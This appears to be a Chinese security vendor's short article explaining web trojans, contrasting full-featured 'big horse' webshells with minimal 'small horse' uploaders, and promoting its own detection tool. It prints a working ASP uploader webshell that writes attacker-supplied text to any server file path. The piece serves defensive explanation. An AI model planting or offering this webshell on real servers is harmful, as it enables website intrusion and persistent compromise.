10秒后自動關(guān)閉
關(guān)于網(wǎng)頁木馬之小馬

    黑客入侵網(wǎng)站/服務(wù)器的方式有很多種,其中一種,就是利用各種手段,將寫好的功能強(qiáng)大的腳本放到服務(wù)器上,然后找到該腳本的地址運行操作服務(wù)器。

 

    其中,就有大馬/小馬 之說。大馬介紹參見:http://www.smartrecovery.cn/help/tech/418.html

 

    大馬就是功能更強(qiáng)大的腳本,可以操作磁盤文件,系統(tǒng)設(shè)置,創(chuàng)建用戶,批量掛馬,刪除文件等,這類網(wǎng)頁木馬容易被木馬查殺工具查殺;

    相對大馬,小馬一是功能較弱,二是代碼較小,因此被稱作小馬;

 

    一般地,小馬的角色,只是為了將大馬傳到服務(wù)器上,基本代碼如下(摘自網(wǎng)絡(luò)):

 

    dim s
    if request('action') = 'set' then

        Text = request('Text')
        FileName = request('FileName')
        set fs = server.CreateObject('Scripting.FileSystemObject')
        set file = fs.OpenTextFile(server.MapPath(FileName),8,True)
        file.writeline Text
        file.close
        set file = nothing
        set fs = nothing
        response.write '保存成功!'

    end if

 

 

    按照原理分析,小馬就是接收數(shù)據(jù),并且寫數(shù)據(jù)到磁盤中文件的功能,功能簡單,與很多正常文件相似,如果簡單查殺,容易影響正常文件,因此很難查殺。

 

    小馬的存在,給服務(wù)器和網(wǎng)站留下了非常大的隱患,因此建議清理之!

 

    值得一提的是,經(jīng)過算法改進(jìn),護(hù)衛(wèi)神目前可以準(zhǔn)確識別絕大多數(shù)小馬,歡迎您的使用。